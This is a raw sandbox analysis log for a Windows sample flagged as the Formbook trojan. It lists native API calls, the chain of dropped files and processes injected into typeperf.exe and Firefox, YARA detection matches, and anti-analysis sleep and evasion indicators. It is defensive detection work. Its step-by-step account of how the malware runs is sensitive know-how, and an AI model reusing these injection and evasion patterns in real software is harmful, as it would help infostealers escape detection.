            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2AF0 NtWriteFile,5_2_00AA2AF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2AD0 NtReadFile,5_2_00AA2AD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2BA0 NtEnumerateValueKey,5_2_00AA2BA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2B80 NtQueryInformationFile,5_2_00AA2B80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2BE0 NtQueryValueKey,5_2_00AA2BE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2BF0 NtAllocateVirtualMemory,5_2_00AA2BF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2CA0 NtQueryInformationToken,5_2_00AA2CA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2CF0 NtOpenProcess,5_2_00AA2CF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2CC0 NtQueryVirtualMemory,5_2_00AA2CC0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2C00 NtQueryInformationProcess,5_2_00AA2C00
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2C60 NtCreateKey,5_2_00AA2C60
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2DB0 NtEnumerateKey,5_2_00AA2DB0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2DD0 NtDelayExecution,5_2_00AA2DD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2D30 NtUnmapViewOfSection,5_2_00AA2D30
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2D00 NtSetInformationFile,5_2_00AA2D00
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2D10 NtMapViewOfSection,5_2_00AA2D10
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2EA0 NtAdjustPrivilegesToken,5_2_00AA2EA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2E80 NtReadVirtualMemory,5_2_00AA2E80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2EE0 NtQueueApcThread,5_2_00AA2EE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2E30 NtWriteVirtualMemory,5_2_00AA2E30
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2FA0 NtQuerySection,5_2_00AA2FA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2FB0 NtResumeThread,5_2_00AA2FB0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2F90 NtProtectVirtualMemory,5_2_00AA2F90
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2FE0 NtCreateFile,5_2_00AA2FE0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2F30 NtCreateSection,5_2_00AA2F30
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2F60 NtCreateProcessEx,5_2_00AA2F60
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3090 NtSetValueKey,5_2_00AA3090
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3010 NtOpenDirectoryObject,5_2_00AA3010
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA39B0 NtGetContextThread,5_2_00AA39B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3D10 NtOpenProcessToken,5_2_00AA3D10
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA3D70 NtOpenThread,5_2_00AA3D70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03344340 NtSetContextThread,LdrInitializeThunk,11_2_03344340
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03344650 NtSuspendThread,LdrInitializeThunk,11_2_03344650
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342B60 NtClose,LdrInitializeThunk,11_2_03342B60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03342BA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_03342BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03342BF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03342BE0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342AF0 NtWriteFile,LdrInitializeThunk,11_2_03342AF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342AD0 NtReadFile,LdrInitializeThunk,11_2_03342AD0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342F30 NtCreateSection,LdrInitializeThunk,11_2_03342F30
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342FB0 NtResumeThread,LdrInitializeThunk,11_2_03342FB0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342FE0 NtCreateFile,LdrInitializeThunk,11_2_03342FE0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03342E80
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03342EE0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03342D30
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03342D10
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03342DF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342DD0 NtDelayExecution,LdrInitializeThunk,11_2_03342DD0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03342C70
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342C60 NtCreateKey,LdrInitializeThunk,11_2_03342C60
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03342CA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_033435C0 NtCreateMutant,LdrInitializeThunk,11_2_033435C0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_033439B0 NtGetContextThread,LdrInitializeThunk,11_2_033439B0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342B80 NtQueryInformationFile,11_2_03342B80
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342AB0 NtWaitForSingleObject,11_2_03342AB0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342F60 NtCreateProcessEx,11_2_03342F60
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342FA0 NtQuerySection,11_2_03342FA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342F90 NtProtectVirtualMemory,11_2_03342F90
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342E30 NtWriteVirtualMemory,11_2_03342E30
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342EA0 NtAdjustPrivilegesToken,11_2_03342EA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342D00 NtSetInformationFile,11_2_03342D00
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342DB0 NtEnumerateKey,11_2_03342DB0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342C00 NtQueryInformationProcess,11_2_03342C00
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342CF0 NtOpenProcess,11_2_03342CF0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03342CC0 NtQueryVirtualMemory,11_2_03342CC0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03343010 NtOpenDirectoryObject,11_2_03343010
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03343090 NtSetValueKey,11_2_03343090
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03343D10 NtOpenProcessToken,11_2_03343D10
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_03343D70 NtOpenThread,11_2_03343D70
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_02945040 NtAllocateVirtualMemory,11_2_02945040
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_02944E90 NtDeleteFile,11_2_02944E90
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_02944F10 NtClose,11_2_02944F10
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_02944CA0 NtCreateFile,11_2_02944CA0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 11_2_02944DD0 NtReadFile,11_2_02944DD0
            Source: C:\Users\user\Desktop\BMhDm7YW62.exe Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
            Source: BMhDm7YW62.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@20/13
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile created: C:\Users\user\AppData\Local\Temp\nskB726.tmpJump to behavior
            Source: BMhDm7YW62.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: BMhDm7YW62.exeReversingLabs: Detection: 54%
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile read: C:\Users\user\Desktop\BMhDm7YW62.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\BMhDm7YW62.exe C:\Users\user\Desktop\BMhDm7YW62.exe
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeProcess created: C:\Users\user\AppData\Local\Temp\okawzsv.exe "C:\Users\user\AppData\Local\Temp\okawzsv.exe"
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess created: C:\Users\user\AppData\Local\Temp\okawzsv.exe C:\Users\user\AppData\Local\Temp\okawzsv.exe
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exe
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: firefox.pdbP source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350794169.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483436758.0000000000BCE000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: typeperf.pdb source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: okawzsv.exe, 00000002.00000003.1274910552.000000001CF60000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000003.1278096689.000000001D140000.00000004.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: okawzsv.exe, okawzsv.exe, 00000005.00000003.1348854988.0000000000883000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000003.1346736464.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000005.00000002.1430135301.0000000000BCE000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000B.00000003.1429101996.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1431661373.000000000311F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\xampp\htdocs\cdf5e02cc6bc498bb3e1a68a897b97eb\Loader\Release\Loader.pdb source: BMhDm7YW62.exe, 00000000.00000002.1295073357.0000000002914000.00000004.00000020.00020000.00000000.sdmp, okawzsv.exe, 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000002.00000000.1266849062.0000000000426000.00000002.00000001.01000000.00000004.sdmp, okawzsv.exe, 00000005.00000000.1273203469.0000000000426000.00000002.00000001.01000000.00000004.sdmp, typeperf.exe, 0000000B.00000002.3736723872.0000000003633000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3733581608.0000000002DC0000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000000.1483909115.0000000002C73000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1663743072.00000000166C3000.00000004.80000000.00040000.00000000.sdmp, okawzsv.exe.0.dr
            Source: Binary string: typeperf.pdbGCTL source: okawzsv.exe, 00000005.00000002.1429982812.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000003.1817748290.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeUnpacked PE file: 5.2.okawzsv.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00415645 push ecx; ret 2_2_00415658
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_0041178A push ecx; ret 2_2_0041179D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040D054 push ebx; retf 5_2_0040D05A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0041429A push ebx; iretd 5_2_0041429B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004034A0 push eax; ret 5_2_004034A2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00414556 push esp; iretd 5_2_0041455E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00407DC3 push esp; retf 5_2_00407DE2
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0041ADA3 push edi; iretd 5_2_0041ADA5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0042B7C2 push eax; ret 5_2_0042B7C4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A609AD push ecx; mov dword ptr [esp], ecx5_2_00A609B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_033009AD push ecx; mov dword ptr [esp], ecx11_2_033009B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_029353E2 push ebx; ret 11_2_02935460
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0294831F push eax; ret 11_2_02948321
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_029310B3 push esp; iretd 11_2_029310BB
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_029321AC push 38B5450Eh; iretd 11_2_029321BF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0294468D push edx; ret 11_2_0294469F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02924920 push esp; retf 11_2_0292493F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02930DF7 push ebx; iretd 11_2_02930DF8
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile created: C:\Users\user\AppData\Local\Temp\okawzsv.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00412E59 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00412E59
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-21132
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA096E rdtsc 5_2_00AA096E
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 2492Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 7480Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeAPI coverage: 1.4 %
            Source: C:\Windows\SysWOW64\typeperf.exeAPI coverage: 2.9 %
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep count: 2492 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep time: -4984000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep count: 7480 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep time: -14960000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00401570 FindFirstFileW,FindNextFileW,FindClose,2_2_00401570
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0293C010 FindFirstFileW,FindNextFileW,FindClose,11_2_0293C010
